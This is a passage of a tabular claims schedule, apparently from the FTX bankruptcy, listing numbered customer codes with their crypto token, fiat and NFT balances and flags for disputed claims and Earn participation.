| 07431038 | | BTC[-0.00000031], ETH[0], GRT[0], LINK[0], SUSHI[0], USD[0.01] | | |
| 07431047 | | ALGO[479.51351216], CUSDT[1], DOGE[1], TRX[.000001], USD[0.00] | Yes | |
| 07431052 | | BRZ[1], CUSDT[3], DOGE[1], GRT[1], TRX[2], USD[0.00] | | |
| 07431055 | | DOGE[6.918], ETH[.00401015], ETHW[.00401015], NFT (342702293657678257/ApexDucks #905)[1], NFT (380256314354680727/SolBunnies #3762)[1], NFT (432633974137762145/Mech #8192)[1], NFT (567498939564192610/Sigma Shark #1092)[1], NFT (569718734165106298/Settler #1890)[1], SHIB[22407.05599453], SOL[.47110151], USD[0.01], USDT[0.00000052] | | |
| 07431059 | | BTC[.00002441] | | |
| 07431071 | | BRZ[2], CUSDT[1], SHIB[3], TRX[3], USD[0.00] | Yes | |
| 07431079 | | BTC[.00004129] | | |
| 07431083 | | USD[0.01] | | |
| 07431084 | | ETHW[.001308], USD[0.00] | | |
| 07431087 | | AAVE[0], BTC[0.00009169], ETH[0], USD[433772.03], USDT[0] | | |
| 07431089 | | AAVE[4.6773175], BTC[0.01215317], DOGE[1155.34573], LINK[31.42881], LTC[3.5491855], SOL[1.9586845], USD[2.59], USDT[0] | | |
| 07431090 | | AAVE[.08681511], ALGO[20.26777117], AVAX[.40933131], BAT[55.76176111], BCH[10.40496846], BRZ[114.66196958], CUSDT[1337.05460966], DAI[7.00049766], DOGE[23171.44006904], ETHW[.97275729], GRT[290.44612733], KSHIB[1629.3814928], LINK[215.93301584], LTC[27.15354646], MATIC[8.19004363], MKR[.00809551], NEAR[2.14697592], PAXG[.00419685], SHIB[121126981.26294255], SOL[32.18510325], SUSHI[5.04731422], TRX[37232.71732533], UNI[1.06871239], USD[1117.26], USDT[1155.05936600], WBTC[.00035026], YFI[.00233422] | Yes | |
| 07431094 | | CUSDT[3], DOGE[1784.84379807], TRX[8167.42300222], USD[4049.00] | | |
| 07431098 | | TRX[166.1992037], USD[0.00] | | |
| 07431102 | | USD[0.00], USDT[0] | | |
| 07431103 | | BRZ[2], CUSDT[70.94765582], DOGE[2], ETH[.06367598], LINK[7.32802232], TRX[7], USD[0.00], USDT[1.11043116] | Yes | |
| 07431104 | | BTC[0.00024947], TRX[.826964], USD[14.76] | | |
| 07431108 | | DOGE[1], USD[0.00] | | |
| 07431114 | | ETH[0], ETHW[0], NFT (344887803444049473/MagicEden Vaults)[1], NFT (358354810317007850/Frog #2538)[1], NFT (358650275005891527/Solninjas #4898)[1], NFT (402622625835113092/Golden bone pass)[1], NFT (412330144197971005/MagicEden Vaults)[1], NFT (504938758821566979/MagicEden Vaults)[1], NFT (512557916753453117/5929)[1], NFT (514552181598393300/MagicEden Vaults)[1], NFT (563418798286448130/MagicEden Vaults)[1], SOL[0.07520000], TRX[0], USD[0.00] | | |
| 07431120 | | BAT[1.00248691], BF_POINT[100], BRZ[1], BTC[0.00004581], CUSDT[6], DOGE[5.02061908], ETH[0], GRT[1.00367791], MATIC[0], SOL[0], TRX[5], USD[0.02], USDT[0.00013523] | Yes | |
| 07431121 | | CUSDT[.62738977], DOGE[.47318243], USD[0.41], USDT[2] | | |
| 07431128 | | BTC[.00000725], SOL[38.65256] | | |
| 07431130 | | BCH[.15553118], BRZ[1], CUSDT[3], USD[0.01] | Yes | |
| 07431133 | | BAT[2.0165555], BF_POINT[200], BRZ[1], BTC[0], CUSDT[14], DOGE[14.08664238], ETH[0], NEAR[0], NFT (555152263779221181/Mystery Box)[1], SHIB[5], SOL[0], SUSHI[0], USD[0.00], USDT[0.00028998] | Yes | |
| 07431138 | | BAT[7.93334133], BRZ[56.2384813], CUSDT[471.72681158], DOGE[3], GRT[5.46338894], LTC[.19134268], SGD[13.30], SHIB[1807664.49746926], SOL[1.07501079], SUSHI[1.3084133], TRX[384.61903124], USD[0.00], USDT[9.94904497] | | |
| 07431141 | | DOGE[158.99168832], SHIB[751.51829047], USD[0.00], USDT[0.00000001] | Yes | |
| 07431143 | | AAVE[1.26471365], AVAX[2.08668043], BAT[1.014821], BRZ[11.71530706], BTC[.12604389], CUSDT[92.50241456], DOGE[773.74576899], ETH[.93793578], ETHW[.85966002], GRT[1.00127229], LINK[9.80972274], MATIC[178.27555551], NEAR[29.58108034], SHIB[162735.79949756], SOL[1.1184963], SUSHI[8.99511233], TRX[38.2389436], UNI[4.20455421], USD[4815.35], USDT[1.076572] | Yes | |
| 07431144 | | CUSDT[1], DOGE[1], TRX[775.75510929], USD[5.00], USDT[2.48841045] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07431148 | | CUSDT[1], DOGE[30.84216832], TRX[1.00048187], USD[0.00] | | |
| 07431152 | | BTC[0], USD[2.49] | | |
| 07431172 | | TRX[0], USD[0.00] | Yes | |
| 07431183 | | UNI[20.3], USD[0.00] | | |
| 07431184 | | USD[21.84] | Yes | |
| 07431186 | | BTC[0], DOGE[0], SOL[0], TRX[0], USD[0.00] | | |
| 07431188 | | BTC[0], USD[2.37], USDT[.0088792] | | |
| 07431209 | | USD[2.00] | | |
| 07431217 | | SOL[.00184682], USD[29461.96], USDT[.0006] | | |
| 07431219 | | ETH[.03603564], ETHW[.03603564], NFT (293820000432946827/Shannon Sharpe's Playbook: Baltimore Ravens vs. Denver Broncos - December 31, 2000 #14)[1], NFT (310516032518375137/Earl Campbell's Playbook: LA Rams vs Houston Oilers - September 4th, 1978 #24)[1], NFT (312467015433987746/Tim Brown's Playbook: Kansas City Chiefs vs. Oakland Raiders - December 9, 2001 #20)[1], NFT (312947315676761250/Doak Walker's Playbook: Texas vs. SMU - November 1, 1947 #37)[1], NFT (320061690148566318/Earl Campbell's Playbook: Houston Oilers vs. Chicago Bears - November 16, 1980 #22)[1], NFT (328045313811226129/Marcus Allen's Playbook: Los Angeles Raiders vs. Washington - January 22, 1984 #21)[1], NFT (335897306819067864/Tim Brown's Playbook: San Diego Chargers vs. Los Angeles Raiders - September 4, 1988 #20)[1], NFT (341464045964101441/Joe Theismann's Playbook: Notre Dame vs. USC - November 30, 1968 #28)[1], NFT (346813030733866207/Tim Brown's Playbook: Michigan State vs. Notre Dame - September 19, 1987 #12)[1], NFT (349141095472324931/Doak Walker's Playbook: Detroit Lions vs. Cleveland Browns - December 28, 1952 #18)[1], NFT (349366581987620799/Doak Walker's Playbook: SMU vs. Santa Clara - September 27, 1947 #40)[1], NFT (349967386667235725/Shannon Sharpe's Playbook: Denver Broncos vs. Los Angeles Raiders - January 9, 1994 #23)[1], NFT (354278012131073556/Shannon Sharpe's Playbook: Baltimore Ravens vs. Oakland Raiders - January 14, 2001 #23)[1], NFT (355092788082608656/Joe Theismann's Playbook: Washington vs. Chicago Bears - September 29, 1985 #16)[1], NFT (355926308904944125/Doak Walker's Playbook: Detroit Lions vs. Cleveland Browns - December 28, 1952 #41)[1], NFT (358075522188358856/Doak Walker's Playbook: Texas vs. SMU - November 1, 1947 #23)[1], NFT (364535678687326787/Marcus Allen's Playbook: USC vs. Washington - November 14, 1981 #12)[1], NFT (370121321964734330/Earl Campbell's Playbook: Houston Oilers vs. Chicago Bears - November 16, 1980 #33)[1], NFT (371132005129385452/Joe Theismann's Playbook: Washington vs. Miami Dolphins - January 30, 1983 #24)[1], NFT (380578546581133587/Tim Brown's Playbook: New York Jets vs. Oakland Raiders - December 2, 2002 #15)[1], NFT (384535714766204257/Tim Brown's Playbook: New York Jets vs. Oakland Raiders - December 2, 2002 #21)[1], NFT (386853034267108512/Marcus Allen's Playbook: Los Angeles Raiders vs. Washington - January 22, 1984 #17)[1], NFT (395394196019309808/Tim Brown's Playbook: Kansas City Chiefs vs. Oakland Raiders - December 9, 2001 #19)[1], NFT (400882655928465503/Joe Theismann's Playbook: New York Giants vs. Washington - October 20, 1974 #22)[1], NFT (402333439624295855/Marcus Allen's Playbook: Seattle Seahawks vs. Los Angeles Raiders - October 7, 1984 #14)[1], NFT (408671854218350946/Shannon Sharpe's Playbook: Baltimore Ravens vs. Oakland Raiders - January 14, 2001 #14)[1], NFT (412353357125309745/Earl Campbell's Playbook: LA Rams vs Houston Oilers - September 4th, 1978 #15)[1], NFT (422545837039457209/Tim Brown's Playbook: Michigan State vs. Notre Dame - September 19, 1987 #20)[1], NFT (425222674461077568/Joe Theismann's Playbook: Notre Dame vs. USC - November 30, 1968 #12)[1], NFT (429299312576678504/Tim Brown's Playbook: New York Jets vs. Oakland Raiders - December 2, 2002 #20)[1], NFT (433779047734910310/Joe Theismann's Playbook: Washington vs. Miami Dolphins - January 30, 1983 #14)[1], NFT (435099775596015541/Earl Campbell's Playbook: Texas vs. Houston - November 5th, 1977 #18)[1], NFT (444161050215084379/Shannon Sharpe's Playbook: Denver Broncos vs. Los Angeles Raiders - January 9, 1994 #15)[1], NFT (445568690650009567/Doak Walker's Playbook: Cleveland Brown vs. Detroit Lions - December 27, 1953 #36)[1], NFT (447321165681630294/Marcus Allen's Playbook: Seattle Seahawks vs. Los Angeles Raiders - October 7, 1984 #18)[1], NFT (459137328978827714/Tim Brown's Playbook: Kansas City Chiefs vs. Oakland Raiders - December 9, 2001 #16)[1], NFT (464984112426354771/Tim Brown's Playbook: San Diego Chargers vs. Los Angeles Raiders - September 4, 1988 #14)[1], NFT (466352304892177420/Joe Theismann's Playbook: New York Giants vs. Washington - October 20, 1974 #14)[1], NFT (472804074111445690/Shannon Sharpe's Playbook: Baltimore Ravens vs. Denver Broncos - December 31, 2000 #25)[1], NFT (476429969656121682/Shannon Sharpe's Playbook: Kansas City Chiefs vs Denver Broncos - October 4, 1992 #27)[1], NFT (476446550190835503/Doak Walker's Playbook: SMU vs. Santa Clara - September 27, 1947 #19)[1], NFT (493391680781763318/Shannon Sharpe's Playbook: Kansas City Chiefs vs Denver Broncos - October 4, 1992 #17)[1], NFT (495047953009654513/Earl Campbell's Playbook: Texas vs. Houston - October 1st, 1977 #28)[1], NFT (496422911090633906/Marcus Allen's Playbook: Kansas City Chiefs vs. Detroit Lions - November 29, 1996 #13)[1], NFT (501046500958094437/Doak Walker's Playbook: Texas vs. SMU - November 1, 1947 #46)[1], NFT (512836607799273833/Tim Brown's Playbook: San Diego Chargers vs. Los Angeles Raiders - September 4, 1988 #21)[1], NFT (514445550145134847/Marcus Allen's Playbook: Kansas City Chiefs vs. Detroit Lions - November 29, 1996 #19)[1], NFT (514767457963828015/Tim Brown's Playbook: Michigan State vs. Notre Dame - September 19, 1987 #19)[1], NFT (528837593515599277/Doak Walker's Playbook: Cleveland Brown vs. Detroit Lions - December 27, 1953 #20)[1], NFT (528910556736084704/Marcus Allen's Playbook: USC vs. Washington - November 14, 1981 #25)[1], NFT (537717093665337785/Earl Campbell's Playbook: Rice vs. Texas - October 1st, 1977 #18)[1], NFT (546632445273424276/Doak Walker's Playbook: Cleveland Brown vs. Detroit Lions - December 27, 1953 #37)[1], NFT (554371557800222907/Earl Campbell's Playbook: Houston Oilers vs. Chicago Bears - November 16, 1980 #34)[1], NFT (559260021053655687/Earl Campbell's Playbook: Texas vs. Houston - November 5th, 1977 #36)[1], NFT (570100413400562716/Hall of Fantasy League #885)[1], NFT (575655796049201763/Joe Theismann's Playbook: Washington vs. Chicago Bears - September 29, 1985 #22)[1], USD[345.72] | | |
| 07431222 | | BRZ[2], CUSDT[1], DOGE[1], GRT[1], TRX[1], USD[0.00] | | |
| 07431225 | | BRZ[1], CUSDT[1], DOGE[1072.30352206], USD[0.00] | | |
| 07431226 | | BAT[1], BRZ[1], CUSDT[3], DOGE[0], ETH[0], TRX[1], USD[0.01], USDT[1] | | |
| 07431227 | | AVAX[.31856672], BRZ[76.19739789], BTC[.00194365], CUSDT[655.19555324], DOGE[405.1771836], ETH[.00920701], ETHW[.00909757], GRT[6.48709886], LINK[.53614876], SHIB[421269.20695877], SOL[1.13722807], SUSHI[5.55965781], TRX[2], USD[0.00], YFI[.00024045] | Yes | |
| 07431229 | | TRX[1], USD[0.00] | | |
| 07431230 | | USD[0.00] | | |
| 07431236 | | DOGE[1], TRX[1], USD[0.01] | | |
| 07431247 | | BAT[4], BRZ[10], CUSDT[35], DOGE[25], ETH[.15328165], ETHW[.15328165], GRT[3], MATIC[3293.7374017], SOL[236.58928965], TRX[23], USD[0.83], USDT[2] | | |
| 07431256 | | DOGE[2], ETH[0], SOL[0] | | |
| 07431263 | | USD[3.06] | | |
| 07431265 | | CUSDT[2], DOGE[4], GRT[2], SUSHI[1], TRX[3], USD[0.00] | | |
| 07431268 | | BTC[0], DOGE[0], ETH[0], GRT[0], LINK[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07431270 | | BRZ[4], SHIB[1], SOL[.00060958], USD[0.00], USDT[1.00035615] | Yes | |
| 07431291 | | GRT[.88090342], USD[10.38] | | |
| 07431296 | | CUSDT[3], DOGE[329.68225188], USD[0.00] | | |
| 07431302 | | USD[3.15] | | |
| 07431308 | | BTC[.00001711], DOGE[1], ETH[.00119593], ETHW[.00119593], TRX[137.95325922], USD[0.00], USDT[0.00003581] | | |
| 07431309 | | BAT[1], BRZ[7], CUSDT[11], GRT[1], TRX[10], USD[0.01], USDT[1] | | |
| 07431319 | | BTC[.00177885], DOGE[1], USD[0.00] | | |
| 07431321 | | BRZ[5.07952967], CUSDT[12], DAI[0], DOGE[3], ETH[1.16201159], ETHW[1.16152353], GRT[1], LINK[227.31578943], SOL[.00003483], TRX[7], USD[0.00], USDT[1.07850143] | Yes | |
| 07431322 | | BTC[0], CUSDT[1], DOGE[1], ETH[0], USD[0.00] | | |
| 07431333 | | NFT (311823074641913235/Hungary Ticket Stub #271)[1], NFT (337590880458432904/Entrance Voucher #1465)[1], NFT (373131241617019379/Miami Ticket Stub #420)[1], NFT (381874523902494108/Belgium Ticket Stub #61)[1], NFT (402902002484144214/Series 1: Capitals #424)[1], NFT (445338669955406374/The Hill by FTX #592)[1], NFT (492077999233962636/Humpty Dumpty #622)[1], NFT (501066291434764462/FTX - Off The Grid Miami #593)[1], NFT (522769781342437355/Series 1: Wizards #385)[1], NFT (525658621831452065/Montreal Ticket Stub #105)[1], NFT (535461583428408670/Barcelona Ticket Stub #1284)[1], USDT[.100762] | | |
| 07431343 | | BTC[.00000366], NFT (497229743772326414/Coachella x FTX Weekend 1 #2588)[1] | | |
| 07431345 | | UNI[0], USD[5.78], USDT[0.00028641] | | |
| 07431347 | | CUSDT[1], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07431348 | | BAT[202.5569033], CUSDT[14], ETH[0.06182015], ETHW[0.06105407], GRT[554.45553988], LINK[8.36395673], LTC[1.17011819], MATIC[41.24453751], SHIB[342681.31937717], SOL[10.71764534], UNI[4.67865689], USD[0.35] | Yes | |
| 07431349 | | BTC[.00000017], USD[0.62] | | |
| 07431356 | | BCH[0], BTC[0.00000052], DOGE[0], USD[0.00] | | |
| 07431358 | | CUSDT[16], DOGE[2], ETH[0], TRX[0], USD[0.00], USDT[8.17497067] | Yes | |
| 07431360 | | BRZ[5], GRT[1], TRX[10], USD[5.62], USDT[1] | | |
| 07431364 | | CUSDT[1], DOGE[1], USDT[0] | | |
| 07431367 | | USD[0.20], USDT[.9773] | | |
| 07431369 | | USD[0.00] | | |
| 07431371 | | BTC[.0002112], ETH[0], ETHW[0], USD[1.40], USDT[.63019252], YFI[.000699] | | |
| 07431375 | | DOGE[1], USD[0.00] | | |
| 07431376 | | BTC[.00006583], CUSDT[811.79172517], DOGE[.68848153], ETH[.00733827], ETHW[.00728082], USD[-18.04] | Yes | |
| 07431378 | | DOGE[1], TRX[1], USD[0.85] | | |
| 07431380 | | DOGE[1], USD[0.00] | | |
| 07431387 | | TRX[.000006], USD[0.01] | | |
| 07431395 | Contingent, Disputed | BTC[.00000001] | | |
| 07431396 | | ETH[.00000001], ETHW[0], UNI[0] | | |
| 07431397 | | CUSDT[1], DOGE[1], TRX[18537.30014572], USD[0.00] | Yes | |
| 07431401 | | BAT[2], BRZ[13], CUSDT[12], DAI[0], DOGE[2], GRT[0], LINK[0], LTC[0], SOL[0], SUSHI[11.86997755], TRX[2], USD[4.78], USDT[2] | | |
| 07431405 | | ETHW[2.836], USD[0.11] | | |
| 07431411 | | CUSDT[1], DOGE[2], TRX[0], USDT[0] | Yes | |
| 07431412 | | CUSDT[1], DOGE[1], ETH[.01907074], ETHW[.01883818], TRX[1], USD[0.00] | Yes | |
| 07431414 | | DOGE[28.4332], SOL[.058994], SUSHI[.25311], USD[0.55], USDT[0] | | |
| 07431422 | | SOL[0], USD[0.00] | | |
| 07431426 | | USD[0.00], USDT[9.94407343] | | |
| 07431428 | | BTC[0], DOGE[.96865], SOL[0.00007366], USD[2.22] | | |
| 07431435 | | NFT (352623589134498946/FTX - Off The Grid Miami #1288)[1] | | |
| 07431438 | | BTC[.01559262], ETH[.05300388], ETHW[.05300388], SOL[20.62037493], USD[0.00] | | |
| 07431440 | | BCH[0], BTC[0], CUSDT[3], DAI[0], DOGE[0], ETH[0], TRX[1], USD[0.01] | Yes | |
| 07431441 | | DOGE[0.85541234], ETH[0], SOL[0], TRX[.908], USD[0.00], USDT[0.00000001] | | |
| 07431446 | | ETH[0], SOL[.01], USD[0.00], USDT[0] | | |
| 07431449 | | USD[2.11] | | |
| 07431451 | | SOL[.046295], USD[0.00] | | |
| 07431454 | | SOL[136.56211936], USD[4.25] | | |
| 07431456 | | USD[0.00], USDT[0.00000001] | | |
| 07431459 | | USD[0.00], USDT[0.00000001] | | |
| 07431460 | | DOGE[1], USDT[0] | | |
| 07431461 | | ETH[0], ETHW[0], USD[0.00] | | |
| 07431465 | | BAT[2], BRZ[6], CUSDT[12], GRT[2], TRX[1], USD[0.00], USDT[3] | | |
| 07431469 | | BRZ[1], CUSDT[1], TRX[0], USD[0.01], USDT[0] | | |
| 07431480 | | BRZ[1], CUSDT[3], LTC[.27032559], TRX[3], USD[0.00] | | |
| 07431483 | | BTC[0.00249306], SHIB[3], TRX[1], USD[41.63] | Yes | |
| 07431490 | | BTC[.0000433], ETH[5.288528], ETHW[5.288528], SOL[4.8], USD[1134.16] | | |
| 07431499 | | BTC[1.04618735], DOGE[1], GRT[1], LTC[2681.00601564], USD[0.01] | Yes | |
| 07431503 | | BTC[.00007], ETH[.00002], ETHW[.00002], SOL[.0093], USD[2.72] | | |
| 07431508 | | BTC[.00009899], DOGE[1], USD[83.49] | | |
| 07431519 | | BAT[1], BTC[0], CUSDT[1], ETH[.00000001], GRT[5.51050682], LTC[.01308897], SHIB[2], TRX[0], USD[259.12], USDT[0.00000001] | Yes | |
| 07431521 | | DOGE[6418.79905327], ETH[.99286799], ETHW[.99286799], GRT[1], TRX[2717.48726567], USD[400.00], USDT[198.90134653] | | |
| 07431525 | | SOL[.03464], USDT[.31566075] | | |
| 07431526 | | CUSDT[575.99644407], DOGE[1110.08112111], ETH[.031072], ETHW[.03068896], GRT[118.98133273], TRX[2], USD[221.85] | Yes | |
| 07431529 | | BTC[0], ETH[0], LINK[0], SOL[0], USD[0.00] | | |
| 07431540 | | CUSDT[1], USD[0.00] | | |
| 07431543 | | SOL[1.30155], USD[0.01] | | |
| 07431545 | | USD[0.71] | | |
| 07431547 | | USD[0.01] | | |
| 07431548 | | BRZ[1], CUSDT[2], DAI[0], DOGE[1], ETH[0], ETHW[0], TRX[3], USD[0.00] | | |
| 07431555 | | DOGE[838.73885], ETH[.10098505], ETHW[.10098505], LTC[5.512639], SOL[16.9791895], SUSHI[11.36795], TRX[463.54205], USD[5.77] | | |
| 07431556 | | USDT[5.009148] | | |
| 07431557 | | CUSDT[1], DOGE[0], ETH[0], ETHW[0], TRX[1], USD[0.01] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07431558 | | BRZ[1], BTC[.04969241], CUSDT[14], DOGE[1059.67679628], GRT[1], TRX[1685.81383297], USD[0.02] | Yes | |
| 07431561 | | BAT[1], BRZ[1], CUSDT[2], TRX[5], USD[0.00], USDT[1] | | |
| 07431567 | | SOL[34.60074595] | | |
| 07431574 | | SOL[0] | | |
| 07431580 | | BRZ[5], CUSDT[8], DOGE[3], GRT[2], MATIC[2.07321108], SHIB[6], TRX[8.031193], USD[0.00], USDT[0] | Yes | |
| 07431591 | | BTC[0], CUSDT[1], DOGE[3], TRX[1], USD[0.01] | | |
| 07431599 | | BTC[0], USD[11939.30] | | |
| 07431600 | | DOGE[.766], SOL[.404], USD[0.00], USDT[0] | | |
| 07431603 | | DAI[.06817887], USD[0.01] | | |
| 07431607 | | SOL[0], USD[110.63] | | |
| 07431611 | | ALGO[0], BF_POINT[200], BTC[0], ETH[0], NFT (290721661957241075/Entrance Voucher #3789)[1], NFT (295156068720632607/Nifty Nanas #4144)[1], NFT (424776522131894543/Nifty Nanas #2928)[1], NFT (473710460255542700/Nifty Nanas #6540)[1], SOL[0.25791700], USD[0.72], USDT[0] | | |
| 07431612 | | USD[0.84] | | |
| 07431615 | | BAT[1.01655550], BCH[0], BTC[0], CUSDT[15], DOGE[0], ETH[0], EUR[0.00], GRT[0], LTC[0], SUSHI[1.23740617], TRX[24.90990522], UNI[0], USD[0.00], USDT[0.00000004] | Yes | |
| 07431619 | | ETH[.00000003], USD[71647.07] | | |
| 07431621 | | TRX[170.68082361], USD[0.00] | | |
| 07431633 | | CUSDT[13572.87343612], DOGE[1], USD[0.00] | | |
| 07431637 | | DOGE[1], TRX[1], USD[0.00] | | |
| 07431639 | | BTC[0], LINK[760.73340411], SOL[0], SUSHI[0], USD[0.00] | | |
| 07431653 | | CUSDT[1], USD[0.00] | | |
| 07431655 | | ETH[.00534979], ETHW[0.00534978] | | |
| 07431656 | | DOGE[1], SHIB[2], TRX[1], USD[0.00] | Yes | |
| 07431665 | | BAT[1], BTC[0], CUSDT[17], ETHW[.00004287], SHIB[7], SOL[0], SUSHI[0.00040369], USD[0.00], USDT[0.00000192] | Yes | |
| 07431666 | | USD[500.00] | | |
| 07431668 | | ETH[0], SOL[.00000001], USD[0.00], USDT[0] | | |
| 07431671 | | CUSDT[2], DOGE[2], TRX[0], USD[0.00], USDT[0] | | |
| 07431688 | | USD[0.00] | Yes | |
| 07431689 | | CUSDT[1], TRX[1], USD[0.01] | | |
| 07431694 | | ETH[.00001197], ETHW[.00001197], NEAR[0.00000249] | Yes | |
| 07431711 | | BAT[3], BRZ[6], CUSDT[8], DOGE[2], ETH[1], GRT[5], SOL[37.29346712], TRX[2], USD[277.20], USDT[1] | | |
| 07431716 | | CUSDT[3], NFT (386485198354164648/Bahrain Ticket Stub #1615)[1], SOL[6.88906405], TRX[1], USD[0.05], USDT[0.00000002] | Yes | |
| 07431717 | | BTC[.00164491], CUSDT[7], DOGE[82.83770003], ETH[.00000032], ETHW[.00000032], SOL[1.11315294], TRX[666.96024053], USD[0.00] | Yes | |
| 07431723 | | BTC[.00000005], DOGE[2.16445586], ETH[1.75345763], ETHW[1.38202527], SHIB[5], SOL[.14655325], TRX[2], USD[156.79], USDT[0] | Yes | |
| 07431724 | | CUSDT[1], DOGE[1], SHIB[1], SOL[.04206149], USD[0.00], USDT[0.00017524] | Yes | |
| 07431725 | | AVAX[0], BTC[0], ETH[0], GRT[0], LTC[0], MATIC[0], NFT (552707355503518924/Angomon #3485)[1], SOL[0.00430467], SUSHI[0], USD[1.05] | | |
| 07431726 | | NFT (323647625889442941/Coachella x FTX Weekend 1 #13035)[1], USDT[.7] | | |
| 07431734 | | BRZ[2], BTC[.00000001], DOGE[3], EUR[0.00], NFT (375311178668458929/Miami Grand Prix 2022 - ID: 5386A685)[1], NFT (392398302404495338/FTX - Off The Grid Miami #1941)[1], NFT (541880964277775403/Saudi Arabia Ticket Stub #985)[1], SHIB[24], TRX[4], USD[0.00] | Yes | |
| 07431736 | | BAT[211.81228426], BRZ[2], CUSDT[17], DOGE[2], SUSHI[1], TRX[10], USD[0.01], USDT[5] | | |
| 07431743 | | DOGE[1], NFT (327837634932189095/Lacasapixel #6)[1], NFT (466314936990748527/Pandas #5)[1], SHIB[70504.27756995], SOL[.06994709], TRX[10.43184521], USD[0.00] | | |
| 07431747 | | BRZ[1], BTC[.01293609], CUSDT[3], DOGE[174.25390395], GRT[197.2044089], SOL[8.11415779], TRX[2], USD[0.00] | Yes | |
| 07431748 | | BTC[0], ETH[0], SOL[0], USD[0.00], USDT[0] | | |
| 07431749 | | BTC[0.00000007], ETH[.00000142], ETHW[.15527096], SHIB[3], SOL[.00000677], TRX[.00591452], USD[472.70] | Yes | |
| 07431753 | | BRZ[1], CUSDT[1], USD[0.01], USDT[.00003827] | Yes | |
| 07431755 | | DOGE[1], SHIB[2], USD[0.01], USDT[0] | | |
| 07431760 | | CUSDT[1], USDT[0.00002992] | | |
| 07431766 | | BTC[0], DOGE[.8443022], ETH[.000636], ETHW[.000636], SUSHI[.476], USD[0.03] | | |
| 07431769 | | USD[0.00] | | |
| 07431770 | | CUSDT[3], DOGE[1], USD[0.19] | Yes | |
| 07431771 | | USDT[0] | | |
| 07431772 | | USD[3.29] | | |
| 07431779 | | BAT[1.0165555], BRZ[1], TRX[.09785585], USD[0.00], USDT[1.10422237] | Yes | |
| 07431783 | | AAVE[.32172623], BTC[.00022275], CUSDT[1], DOGE[32], ETH[.00421777], ETHW[.00421777], SOL[2.00460006], USD[0.00] | | |
| 07431784 | | CUSDT[6], DOGE[1.00077473], SHIB[1], TRX[3], USD[0.14], USDT[1] | | |
| 07431788 | | DOGE[.3397], USD[2.59] | | |
| 07431789 | | ETHW[1.30047231], USD[0.00] | | |
| 07431790 | | BTC[0], SHIB[9190.00000004], USD[0.00] | Yes | |
| 07431799 | | DOGE[6], TRX[1], USD[49.44], USDT[0] | | |
| 07431802 | | CUSDT[1], DOGE[280.94149131], USD[0.00] | Yes | |
| 07431818 | | BAT[0], DOGE[0], ETH[0], GRT[2191.87330469], LTC[0], NEAR[.00000002], SHIB[4267923.16001258], SOL[0.00006051], SUSHI[0], TRX[1], USD[122.28] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07431820 | | USD[0.00], USDT[0] | | |
| 07431832 | | USD[0.01], USDT[0] | | |
| 07431833 | | BAT[1.011886841, BCH[42.15579281], BRZ[1], CUSDT[2], DOGE[108566.08808278], GRT[2.04746102], LINK[1.08732678], SUSHI[1.07899399], USD[0.01], USDT[1.07934718] | Yes | |
| 07431836 | | TRX[232.767], USD[5.08] | | |
| 07431842 | | BTC[.00016576] | | |
| 07431844 | | TRX[.000015], USD[0.00], USDT[0] | | |
| 07431845 | | BTC[0], ETH[0], ETHW[2.51763095], SOL[0], USD[4895.68], USDT[0] | | |
| 07431848 | | DOGE[4.992], USD[0.00], USDT[0] | | |
| 07431851 | | BRZ[1], CUSDT[8], DOGE[2], LTC[13.11490369], TRX[3], UNI[26.23744712], USD[0.00] | | |
| 07431856 | | USD[0.00] | | |
| 07431860 | | ETH[0], ETHW[0.00022831], LINK[.06], MATIC[.16], SOL[.006], USD[0.00], USDT[0] | | |
| 07431865 | | USD[0.00] | | |
| 07431885 | | DOGE[2], TRX[173.07611687], USD[0.00] | | |
| 07431887 | | BRZ[1], DOGE[2129.71954722], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07431888 | | AAVE[.99905], BTC[0], ETH[0], LINK[14.3815259], PAXG[.2685663], USD[0.00], USDT[0.00001763] | | |
| 07431912 | | BTC[.00006058], CUSDT[3], DOGE[343.68665238], LTC[.05504065], USD[0.00] | | |
| 07431915 | | SOL[13.85806514], USD[0.00], USDT[0] | | |
| 07431927 | | BAT[5.00837044], DOGE[1], ETH[0], LINK[.4760627], SOL[0], TRX[373.14633641], USD[0.00], YFI[0] | Yes | |
| 07431931 | | DOGE[2], USD[0.09] | | |
| 07431939 | | USD[1.11] | | |
| 07431947 | | LTC[.02552674], USD[0.00] | | |
| 07431953 | | BCH[0.00001160], BRZ[0], BTC[0.00001549], CUSDT[5], DAI[0], DOGE[0], ETH[0], ETHW[0], GBP[0.00], LINK[0], PAXG[0], SGD[0.00], SHIB[0], SOL[0], SUSHI[0], TRX[1], UNI[0], USD[0.82], USDT[0.00000335], YFI[0] | Yes | |
| 07431959 | | BRZ[1], DAI[0], DOGE[2], UNI[0], USD[0.00] | | |
| 07431965 | | ETH[0], SOL[0], USD[0.00] | | |
| 07431987 | | USD[0.00] | | |
| 07431988 | | BTC[.0015739], ETH[.0459], ETHW[.0459] | | |
| 07431989 | | CUSDT[10], DAI[0], DOGE[0], SOL[0], USD[0.00] | | |
| 07431997 | Contingent, Disputed | BTC[0], USD[0.00] | | |
| 07431999 | | CUSDT[1], ETH[0], TRX[1], USD[0.00] | | |
| 07432006 | | DOGE[0], MATIC[0], NFT (368556306223768648/Bahrain Ticket Stub #2034)[1], NFT (503304515948264601/Barcelona Ticket Stub)[1], SHIB[2], TRX[0], USD[0.03] | Yes | |
| 07432020 | | BTC[.0004041], GRT[1], SOL[.00050588], USD[0.00] | | |
| 07432021 | | CUSDT[2], DOGE[1], TRX[1], USD[0.00] | | |
| 07432022 | | DOGE[522.46933028], USD[0.00] | | |
| 07432024 | | USD[0.00], USDT[14.45874801] | | |
| 07432025 | | BTC[0], DOGE[0], TRX[0], USD[0.00] | | |
